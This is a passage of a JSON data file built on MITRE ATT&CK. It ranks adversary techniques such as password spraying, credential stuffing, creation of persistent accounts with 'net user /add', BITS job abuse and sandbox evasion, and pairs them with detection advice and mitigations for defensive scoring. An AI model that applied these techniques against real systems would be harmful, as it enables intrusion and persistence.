\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "url": "https://attack.mitre.org/techniques/T1110/001", + "detection": "Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + } + ] + }, + { + "tid": "T1110.002", + "name": "Brute Force: Password Cracking", + "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. OS Credential Dumping is used to obtain password hashes, this may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", + "url": "https://attack.mitre.org/techniques/T1110/002", + "detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as OS Credential Dumping or Kerberoasting.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1110.003", + "name": "Brute Force: Password Spraying", + "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n
    \n
  • SSH (22/TCP)
    • \n
  • Telnet (23/TCP)
    • \n
  • FTP (21/TCP)
    • \n
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
    • \n
  • LDAP (389/TCP)
    • \n
  • Kerberos (88/TCP)
    • \n
  • RDP / Terminal Services (3389/TCP)
    • \n
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
    • \n
  • MSSQL (1433/TCP)
    • \n
  • Oracle (1521/TCP)
    • \n
  • MySQL (3306/TCP)
    • \n
  • VNC (5900/TCP)
    • \n
\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", + "url": "https://attack.mitre.org/techniques/T1110/003", + "detection": "Monitor authentication logs for system and application login failures of Valid Accounts. Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n
    \n
  • Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.
    • \n
  • Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.
    • \n
  • All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.
    • \n
", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + } + ] + }, + { + "tid": "T1110.004", + "name": "Brute Force: Credential Stuffing", + "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n
    \n
  • SSH (22/TCP)
    • \n
  • Telnet (23/TCP)
    • \n
  • FTP (21/TCP)
    • \n
  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)
    • \n
  • LDAP (389/TCP)
    • \n
  • Kerberos (88/TCP)
    • \n
  • RDP / Terminal Services (3389/TCP)
    • \n
  • HTTP/HTTP Management Services (80/TCP & 443/TCP)
    • \n
  • MSSQL (1433/TCP)
    • \n
  • Oracle (1521/TCP)
    • \n
  • MySQL (3306/TCP)
    • \n
  • VNC (5900/TCP)
    • \n
\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)", + "url": "https://attack.mitre.org/techniques/T1110/004", + "detection": "Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1036", + "name": "Account Use Policies", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "url": "https://attack.mitre.org/mitigations/M1036" + } + ] + } + ] + }, + { + "rank": 42, + "tid": "T1213", + "name": "Data from Information Repositories", + "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n
    \n
  • Policies, procedures, and standards
    • \n
  • Physical / logical network diagrams
    • \n
  • System architecture diagrams
    • \n
  • Technical system documentation
    • \n
  • Testing / development credentials
    • \n
  • Work / project schedules
    • \n
  • Source code snippets
    • \n
  • Links to network shares and other internal resources
    • \n
\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as Sharepoint and Confluence, specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.", + "url": "https://attack.mitre.org/techniques/T1213", + "detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ", + "score": 1.1647714285714286, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1213.001", + "name": "Data from Information Repositories: Confluence", + "description": "Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n
    \n
  • Policies, procedures, and standards
    • \n
  • Physical / logical network diagrams
    • \n
  • System architecture diagrams
    • \n
  • Technical system documentation
    • \n
  • Testing / development credentials
    • \n
  • Work / project schedules
    • \n
  • Source code snippets
    • \n
  • Links to network shares and other internal resources
    • \n
", + "url": "https://attack.mitre.org/techniques/T1213/001", + "detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1213.002", + "name": "Data from Information Repositories: Sharepoint", + "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n
    \n
  • Policies, procedures, and standards
    • \n
  • Physical / logical network diagrams
    • \n
  • System architecture diagrams
    • \n
  • Technical system documentation
    • \n
  • Testing / development credentials
    • \n
  • Work / project schedules
    • \n
  • Source code snippets
    • \n
  • Links to network shares and other internal resources
    • \n
", + "url": "https://attack.mitre.org/techniques/T1213/002", + "detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. ", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1213.003", + "name": "Data from Information Repositories: Code Repositories", + "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop Exploits, while credentials may provide access to additional resources using Valid Accounts.(Citation: Wired Uber Breach)(Citation: Krebs Adobe)", + "url": "https://attack.mitre.org/techniques/T1213/003", + "detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 43, + "tid": "T1136", + "name": "Create Account", + "description": "Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.", + "url": "https://attack.mitre.org/techniques/T1136", + "detection": "Monitor for processes and command-line parameters associated with account creation, such as net user or useradd. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.\nCollect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", + "score": 1.1619405019857143, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ], + "subtechniques": [ + { + "tid": "T1136.001", + "name": "Create Account: Local Account", + "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. On macOS systems the dscl -create command can be used to create a local account.\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "url": "https://attack.mitre.org/techniques/T1136/001", + "detection": "Monitor for processes and command-line parameters associated with local account creation, such as net user /add , useradd , and dscl -create . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1136.002", + "name": "Create Account: Domain Account", + "description": "Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.\nSuch accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", + "url": "https://attack.mitre.org/techniques/T1136/002", + "detection": "Monitor for processes and command-line parameters associated with domain account creation, such as net user /add /domain. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1136.003", + "name": "Create Account: Cloud Account", + "description": "Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)\nAdversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.", + "url": "https://attack.mitre.org/techniques/T1136/003", + "detection": "Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + } + ] + }, + { + "rank": 44, + "tid": "T1197", + "name": "BITS Jobs", + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\nThe interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\nBITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.(Citation: CTU BITS Malware June 2016)", + "url": "https://attack.mitre.org/techniques/T1197", + "detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the BITSAdmin tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS)\nMonitor usage of the BITSAdmin tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)", + "score": 1.1358301501742856, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [] + }, + { + "rank": 45, + "tid": "T1497", + "name": "Virtualization/Sandbox Evasion", + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\nAdversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)", + "url": "https://attack.mitre.org/techniques/T1497", + "detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "score": 1.1188043226, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1497.001", + "name": "Virtualization/Sandbox Evasion: System Checks", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)", + "url": "https://attack.mitre.org/techniques/T1497/001", + "detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "mitigations": [] + }, + { + "tid": "T1497.002", + "name": "Virtualization/Sandbox Evasion: User Activity Based Checks", + "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ", + "url": "https://attack.mitre.org/techniques/T1497/002", + "detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "mitigations": [] + }, + { + "tid": "T1497.003", + "name": "Virtualization/Sandbox Evasion: Time Based Evasion", + "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)", + "url": "https://attack.mitre.org/techniques/T1497/003", + "detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ", + "mitigations": [] + } + ] + }, + { + "rank": 46, + "tid": "T1222", + "name": "File and Directory Permissions Modification", + "description": "Adversaries may modify file 